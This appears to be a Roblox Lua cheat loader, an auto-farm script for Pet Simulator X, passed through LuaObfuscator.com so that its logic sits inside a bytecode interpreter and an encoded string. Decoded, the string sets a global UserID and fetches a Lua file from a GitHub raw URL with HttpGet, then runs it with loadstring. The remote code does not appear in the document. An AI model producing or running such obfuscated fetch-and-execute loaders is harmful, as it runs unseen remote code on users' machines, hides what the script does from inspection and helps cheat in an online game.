
--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.2) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==4) then v16=function(v17,v18,...)local v27=1;local v28;v17=v5(v4(v17,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v79=0;local v80;while true do if (v79==0) then v80=v3(v1(v29,16));if v28 then local v110=v6(v80,v28);v28=nil;return v110;else return v80;end break;end end end end);local function v30(v31,v32,v33)if v33 then local v81=1340 -(136 + 1204);local v82;while true do if (v81==(0 -(0 + 0))) then v82=(v31/((1 + 1 + 0)^(v32-(1738 -(666 + 1071)))))%((78 -(72 + (12 -8)))^(((v33-(1 + 0)) -(v32-(4 -3))) + 1 + 0));return v82-(v82%1);end end else local v83=(3 -1)^(v32-((1592 -(1528 + 63)) -0));return (((v31%(v83 + v83))>=v83) and (1 + 0)) or (0 + 0);end end local function v34()local v47=0;local v48;while true do if (v47==(1183 -(356 + 826))) then return v48;end if ((1650 -(313 + (4070 -2733)))==v47) then v48=v2(v17,v27,v27);v27=v27 + (1 -0);v47=(16 -12) -(6 -3);end end end local function v35()local v49,v50=v2(v17,v27,v27 + (643 -(28 + 613)));v27=v27 + 2;return (v50 * (421 -165)) + v49;end local function v36()local v51,v52,v53,v54=v2(v17,v27,v27 + (217 -(210 + 4)));v27=v27 + 4;return (v54 * (5620738 + 11156478)) + (v53 * 65536) + (v52 * (425 -169)) + v51;end local function v37()local v55=(385 -277) -(70 + 1 + 37);local v56;local v57;local v58;local v59;local v60;local v61;while true do if ((4 -2)==v55) then v60=v30(v57,(3556 -1571) -(1184 + 721 + 59),27 + 4);v61=((v30(v57,136 -104)==(291 -((1261 -(295 + 892)) + 216))) and  -(1021 -(482 + 538))) or (85 -(83 + 1));v55=6 -3;end if (v55==(1 + 0)) then v58=1;v59=(v30(v57,2 -1,14 + 6) * ((1242 -(306 + 533 + 401))^(21 + 11))) + v56;v55=1 + 0 + 1;end if (v55==(0 + (1910 -(1642 + 268)))) then v56=v36();v57=v36();v55=1 + 0;end if (v55==3) then if (v60==(0 + 0)) then if (v59==(0 + 0)) then return v61 * 0;else local v111=0 + 0;while true do if ((0 -(0 -0))==v111) then v60=1 + 0;v58=0;break;end end end elseif (v60==(3791 -(1696 + 48))) then return ((v59==(1970 -(1389 + 581))) and (v61 * ((1899 -(547 + 952 + 399))/(849 -(597 + 252))))) or (v61 * NaN);end return v9(v61,v60-(117 + (1663 -(605 + 152)))) * (v58 + (v59/(2^(1282 -(1146 + 84)))));end end end local function v38(v39)local v62;if  not v39 then local v84=496 -(47 + 86 + 363);while true do if (((2863 -(524 + 526)) -(1462 + 351))==v84) then v39=v36();if (v39==(184 -(134 + 50))) then return "";end break;end end end v62=v4(v17,v27,(v27 + v39) -(716 -(225 + 490)));v27=v27 + v39;local v63={};for v77=(578 + 150) -(640 + 87), #v62 do v63[v77]=v3(v2(v4(v62,v77,v77)));end return v7(v63);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v64=359 -(239 + 120);local v65;local v66;local v67;local v68;local v69;local v70;local v71;local v72;while true do if (v64==(78 -(66 + 11))) then v67=nil;v68=nil;v64=2;end if (v64==(1748 -(508 + 1240))) then v65=1915 -(1712 + 203);v66=nil;v64=1;end if (v64~=2) then else v69=nil;v70=nil;v64=1846 -(502 + 1341);end if (v64==(1 + 2)) then v71=nil;v72=nil;v64=4;end if (v64==(1363 -(1227 + 132))) then while true do if (v65~=(1 + 2)) then else v72=nil;while true do if ((2 + 0)==v66) then for v122=1 + 0,v71 do local v123=0;local v124;local v125;local v126;while true do if (v123~=(0 -0)) then else v124=1825 -(1809 + 16);v125=nil;v123=813 -(643 + 169);end if ((1280 -(281 + 998))==v123) then v126=nil;while true do if ((1701 -(802 + 898))==v124) then if (v125==(1 + 0)) then v126=v34()~=(535 -(442 + 93));elseif (v125==(2 + 0)) then v126=v37();elseif (v125==(7 -4)) then v126=v38();end v72[v122]=v126;break;end if (v124~=(0 -0)) then else v125=v34();v126=nil;v124=831 -(508 + 322);end end break;end end end v70[3 + 0]=v34();for v127=535 -(400 + 134),v36() do local v128=0 + 0;local v129;local v130;local v131;local v132;while true do if (v128==(2 + 0)) then while true do if (v129==0) then local v137=0 -0;while true do if (v137==(1 + 0)) then v129=1 -0;break;end if (v137==(1937 -(1091 + 846))) then v130=0 -0;v131=nil;v137=1;end end end if (v129~=(1 + 0)) then else v132=nil;while true do if (v130==(0 -0)) then local v141=0 + 0;while true do if (v141==0) then v131=0 + 0;v132=nil;v141=1668 -(208 + 1459);end if (v141~=(1 + 0)) then else v130=1;break;end end end if (v130==(1 + 0)) then while true do if (v131~=(0 + 0)) then else v132=v34();if (v30(v132,1,1)==(1776 -(948 + 828))) then local v167=0;local v168;local v169;local v170;local v171;local v172;while true do if (v167~=(0 -0)) then else v168=1297 -(563 + 734);v169=nil;v167=1 + 0;end if (v167~=(3 -1)) then else v172=nil;while true do if (v168~=(4 -3)) then else v171=nil;v172=nil;v168=2 + 0;end if (v168==(0 -0)) then local v183=0;while true do if (v183==(494 -(450 + 44))) then v169=0 + 0;v170=nil;v183=1;end if (v183==1) then v168=1;break;end end end if (v168==2) then while true do if ((238 -(161 + 74))==v169) then if (v30(v171,1 + 2,3 + 0)~=(58 -(48 + 9))) then else v172[4]=v72[v172[204 -(44 + 156)]];end v67[v127]=v172;break;end if (v169==1) then local v193=0 -0;while true do if (v193==(0 + 0)) then v172={v35(),v35(),nil,nil};if (v170==(1323 -(933 + 390))) then local v204=0 -0;local v205;while true do if (v204==0) then v205=0 + 0;while true do if (v205==(0 + 0)) then v172[4 -1]=v35();v172[9 -5]=v35();break;end end break;end end elseif (v170==(395 -(255 + 139))) then v172[908 -(751 + 154)]=v36();elseif (v170==(2 + 0)) then v172[3]=v36() -((2 + 0)^(7 + 9));elseif (v170~=(286 -(152 + 131))) then else local v217=0 -0;local v218;local v219;while true do if (v217==0) then v218=0 -0;v219=nil;v217=1;end if (v217==(1 + 0)) then while true do if (v218==(369 -(306 + 63))) then v219=0 + 0;while true do if (v219==(0 + 0)) then v172[9 -6]=v36() -((568 -(261 + 305))^(20 -4));v172[1762 -(1204 + 554)]=v35();break;end end break;end end break;end end end v193=1;end if (v193==(1652 -(20 + 1631))) then v169=2;break;end end end if (0~=v169) then else local v194=0;while true do if (v194~=(0 -0)) then else local v200=0;while true do if (v200==(822 -(49 + 772))) then v194=1373 -(1017 + 355);break;end if (v200==0) then v170=v30(v132,2,3 -0);v171=v30(v132,7 -3,5 + 1);v200=1 -0;end end end if (v194~=(1434 -(1101 + 332))) then else v169=377 -(205 + 171);break;end end end if (v169==(584 -(89 + 493))) then local v195=470 -(162 + 308);while true do if (v195~=0) then else local v201=0 -0;while true do if (v201~=0) then else if (v30(v171,1 + 0,783 -(96 + 686))==(1248 -(241 + 1006))) then v172[4 -2]=v72[v172[2]];end if (v30(v171,1489 -(1414 + 73),3 -1)~=(2 -1)) then else v172[3]=v72[v172[1688 -(796 + 889)]];end v201=1 -0;end if (v201==(1 -0)) then v195=1235 -(708 + 526);break;end end end if (v195~=(4 -3)) then else v169=13 -10;break;end end end end break;end end break;end if (v167~=(1 -0)) then else v170=nil;v171=nil;v167=1 + 1;end end end break;end end break;end end break;end end break;end if (v128==(926 -(525 + 400))) then v131=nil;v132=nil;v128=1785 -(604 + 1179);end if ((0 -0)~=v128) then else v129=1486 -(993 + 493);v130=nil;v128=1940 -(1376 + 563);end end end v66=5 -2;end if (v66==0) then local v117=1388 -(1364 + 24);local v118;while true do if (v117==(0 + 0)) then v118=0;while true do if (v118~=(0 + 0)) then else local v134=1982 -(523 + 1459);while true do if ((1 -0)~=v134) then else v118=1;break;end if ((0 -0)==v134) then v67={};v68={};v134=1;end end end if ((407 -(250 + 156))~=v118) then else v69={};v66=1 + 0;break;end end break;end end end if (v66==1) then local v119=1170 -(175 + 995);while true do if (v119~=(1538 -(487 + 1051))) then else v70={v67,v68,nil,v69};v71=v36();v119=3 -2;end if (v119~=1) then else v72={};v66=1 + 1;break;end end end if (v66~=(1421 -(1368 + 50))) then else local v120=0 + 0;local v121;while true do if (v120==(0 + 0)) then v121=0 + 0;while true do local v133=0 + 0;while true do if ((1824 -(1059 + 765))==v133) then if (v121~=1) then else return v70;end if (v121==(0 + 0)) then local v138=1312 -(1308 + 4);while true do if (v138==(131 -(110 + 21))) then for v147=3 -2,v36() do v68[v147-1]=v42();end for v149=1 + 0,v36() do v69[v149]=v36();end v138=3 -2;end if (v138~=(1 + 0)) then else v121=1 + 0;break;end end end break;end end end break;end end end end break;end if (v65~=0) then else local v103=0 -0;while true do if (v103==(0 + 0)) then v66=0;v67=nil;v103=1 + 0;end if (v103~=(1 + 0)) then else v65=1 + 0;break;end end end if (v65~=(1 + 0)) then else v68=nil;v69=nil;v65=1168 -(244 + 922);end if (v65~=(6 -4)) then else local v104=738 -(653 + 85);while true do if ((1912 -(636 + 1276))==v104) then v70=nil;v71=nil;v104=4 -3;end if (v104~=1) then else v65=14 -11;break;end end end end break;end end end local function v43(v44,v45,v46)local v73=0;local v74;local v75;local v76;while true do if (v73==0) then v74=v44[1];v75=v44[2];v73=1;end if (v73==1) then v76=v44[3];return function(...)local v88=1;local v89= -1;local v90={...};local v91=v13("#",...) -1;local function v92()local v93=v74;local v94=v75;local v95=v76;local v96=v41;local v97={};local v98={};local v99={};for v105=0,v91 do if (((11118 -6445)>=1116) and (v105>=v95)) then v97[v105-v95]=v90[v105 + (502 -(418 + 83))];else v99[v105]=v90[v105 + 1 + 0 + 0];end end local v100=(v91-v95) + (3 -2);local v101;local v102;while true do local v106=0;local v107;local v108;while true do if (((0 -0)==v106) or ((2100 -(884 + 129))==(1109 -825))) then v107=0 -0;v108=nil;v106=1 + 0;end if ((((2675 + 1043) -(1183 + 55))>1232) and (v106==(2 -1))) then while true do if ((v107==(0 + 0)) or ((2950 + 1793 + 100)<(3191 -(858 + 60)))) then v108=0 -0;while true do if (((3610 -(135 + 1065))>=157) and (v108==(0 + 0))) then local v135=0 + 0;while true do if (((1676 -(380 + 866))<=(321 + 1809)) and (v135==1)) then v108=1;break;end if ((3911>((2010 + 1901) -(19 + 50))) and (v135==0)) then v101=v93[v88];v102=v101[1 + 0];v135=1873 -(1688 + 184);end end end if ((v108==(1 -0)) or ((3606 -(847 + 813))>(979 + 265 + 961))) then if ((v102<=(4 + 0)) or (3223==(9121 -4729))) then if (((2507 -1604)>=179) and (v102<=1)) then if (((1195 + 815)>=(1253 -933)) and (v102>((864 -(27 + 837)) + 0))) then v99[v101[6 -4]]=v46[v101[1 + 2]];else v99[v101[1 + 1]]();end elseif (((6343 -(491 + (1002 -(34 + 22))))==(5553 -(180 + 467))) and (v102<=(9 -7))) then do return;end elseif (((1858 -(193 + 1054))<=(376 + (1405 -(163 + 772)))) and (v102==(10 -7))) then if ((v99[v101[784 -(678 + 104)]]==v101[11 -(4 + 3)]) or (3438<=(3525 -1332))) then v88=v88 + (1763 -(518 + 1244));else v88=v101[3];end else v99[v101[762 -(377 + 383)]][v101[1 + 1 + 1]]=v101[4 + 0 + 0];end elseif ((v102<=((7 -1) + 1)) or ((918 + 2550)>=(4401 -(443 + 193)))) then if ((v102<=(4 + 1)) or ((7267 -4605)<=(3713 -(596 + 1238)))) then v99[v101[695 -(184 + 509)]]=v101[3];elseif (((6714 -3600)>(2424 -853)) and (v102>(93 -(22 + 34 + 31)))) then local v153=19 -(10 + 9);local v154;local v155;while true do if ((v153==(3 -2)) or ((1978 -1472)>(115 + 1231))) then while true do if (((822 + 748)>(58 + 52)) and (v154==(0 + 0))) then v155=v101[6 -4];v99[v155]=v99[v155](v14(v99,v155 + (1728 -(828 + 270 + 629)),v89));break;end end break;end if (((1663 -853)>=(323 -174)) and (v153==(0 -0))) then v154=0 -0;v155=nil;v153=1 + 0;end end else local v156=625 -(107 + 518);local v157;local v158;local v159;local v160;while true do if ((4459<4535) and (v156==(494 -(218 + 274)))) then while true do if ((3732==(751 + 2981)) and (v157==(0 + 0))) then v158=0;v159=nil;v157=446 -(102 + 343);end if ((1==v157) or ((322 + 1132 + 884)>2885)) then v160=nil;while true do if (((1268 -756)<((2654 + 4323) -3411)) and (v158==(2 -1))) then v99[v159 + (3 -2)]=v160;v99[v159]=v160[v101[4]];break;end if ((2359<(1789 + 1458)) and (v158==(0 -0))) then local v190=761 -(359 + 402);local v191;while true do if ((((0 -0) -0)==v190) or ((1076 + 2601)<604)) then v191=0 + 0 + 0;while true do if (((1 + 234)<=4420) and ((0 -0)==v191)) then v159=v101[2];v160=v99[v101[11 -8]];v191=(2 -1) + 0;end if ((((2747 + 779) -(5526 -3670))>((1227 -(220 + 787)) -162)) and (v191==1)) then v158=1863 -(123 + 1739);break;end end break;end end end end break;end end break;end if ((v156==0) or ((6073 -1722)<(3641 + 29))) then v157=0 -0;v158=nil;v156=1 -0;end if (((10076 -5430)>(1378 -((808 -404) + 576))) and (v156==(1 + (69 -(28 + 41))))) then v159=nil;v160=nil;v156=(1694 -(1573 + 120)) + 1;end end end elseif (((2848 + 246)>(130 + 213)) and (v102<=8)) then v88=v101[2 + 1];elseif (((1389 + 3126)==(4391 + (203 -79))) and (v102>(15 -(3 + 3)))) then for v173=v101[183 -(27 + 154)],v101[8 -5] do v99[v173]=nil;end else local v161=148 -(99 + 49);local v162;local v163;local v164;local v165;local v166;while true do if ((v161==((1706 -(886 + 818)) + 0)) or ((1334 -736)<=(212 + 158))) then v166=nil;while true do if (((7 -5)==v162) or (((10509 -6908) + 1287)<(12043 -7691))) then for v184=v163,v89 do local v185=0;local v186;while true do if ((v185==0) or ((12137 -8410)<(1917 -1521))) then v186=0 + 0;while true do if (((549 + 59)<((1743 + 9181) -7949)) and (v186==(1621 -(1314 + 307)))) then v166=v166 + ((799 -(783 + 15)) -0);v99[v184]=v164[v166];break;end end break;end end end break;end if (((9233 -(431 + 4452))>=(5972 -2731)) and (v162==(312 -(291 + 20)))) then local v179=0 -0;local v180;while true do if ((v179==(84 -(69 + 15))) or (2001==(3070 -(65 + 124)))) then v180=(0 -0) -0;while true do if ((v180==(1267 -((1602 -712) + 45 + 331))) or ((5035 -(440 + 128))==(3712 -(357 + 1169)))) then v162=2 + (0 -0);break;end if ((v180==(0 -0)) or (3673>(16351 -11369))) then local v198=0 + 0;while true do if (((2879 + 25)>(2369 -(210 + 124))) and (v198==((2185 -1688) -(97 + 400)))) then v89=(v165 + v163) -(1 + (302 -(12 + 290)));v166=0 + 0;v198=(2 -1) -0;end if ((1==v198) or ((5456 -(112 + 1836))>=4221)) then v180=1100 -(407 + 250 + 442);break;end end end end break;end end end if ((v162==((0 -0) + 0)) or ((4469 -((3072 -1653) + 516))>=(2404 + 864))) then local v181=254 -(167 + 87);local v182;while true do if ((v181==((3845 -2526) -(275 + 1044))) or ((3839 -(4104 -(1226 + 605)))<=(395 -(157 + 136)))) then v182=0 + 0;while true do if (((1260 + (3420 -(1336 + 299)))>=(1347 -(41 + (2733 -2078)))) and (((741 -(368 + 369)) -3)==v182)) then v162=2 -1;break;end if (((2150 -892)<=(1167 + 3582)) and (v182==(1306 -(993 + 313)))) then local v199=0;while true do if ((v199==1) or ((3578 -((569 -407) + 1079))==(62 + 107))) then v182=(1 -0) + (0 -0);break;end if (((259 + 789)>=(807 -233)) and (v199==(0 -0))) then v163=v101[2 + 0];v164,v165=v96(v99[v163](v14(v99,v163 + (1114 -(586 + (542 -(14 + 1)))),v101[482 -(444 + 35)])));v199=1991 -(154 + 1836);end end end end break;end end end end break;end if ((v161==(2 -1)) or ((773 -(308 + 140))>=((2107 + 1546) -(6 + 363)))) then v164=nil;v165=nil;v161=(199 -(31 + 31)) -(101 + (116 -82));end if (((5342 -(589 + 728))<(3734 + 78 + 313)) and (v161==(0 + 0))) then local v176=0;while true do if (((10771 -6815)>=(4965 -3455)) and (v176==(0 + (841 -(558 + 283))))) then v162=632 -(184 + 448);v163=nil;v176=1 + 0;end if (((6210 -2175)>(2427 + (3040 -1891))) and (v176==(1 + 0))) then v161=1 -0;break;end end end end end v88=v88 + 1 + 0;break;end end break;end end break;end end end end A,B=v41(v12(v92));if  not A[1] then local v109=v44[4][v88] or "?";error("Script error at ["   .. v109   .. "]:"   .. A[2]);else return v14(A,2,B);end end;end end end return v43(v42(),{},v18)(...);end;v16("LOL!083O00028O0003023O005F4703063O00557365724944023O00585F199B41030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F72584175746F4661726D2F6D61696E2F48617374654661726D2E6C756100153O0012053O00014O000A000100013O0026033O0002000100010004083O00020001001205000100013O00260300010005000100010004083O00050001001201000200023O003004000200030004001201000200053O001201000300063O002006000300030007001205000500084O0009000300054O000700023O00024O0002000100010004083O001400010004083O000500010004083O001400010004083O000200012O00023O00017O00153O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v10(),...);break;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==3) then v13=select;v14=unpack or table.unpack;v15=tonumber;v16=nil;v0=4;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=3;end end end
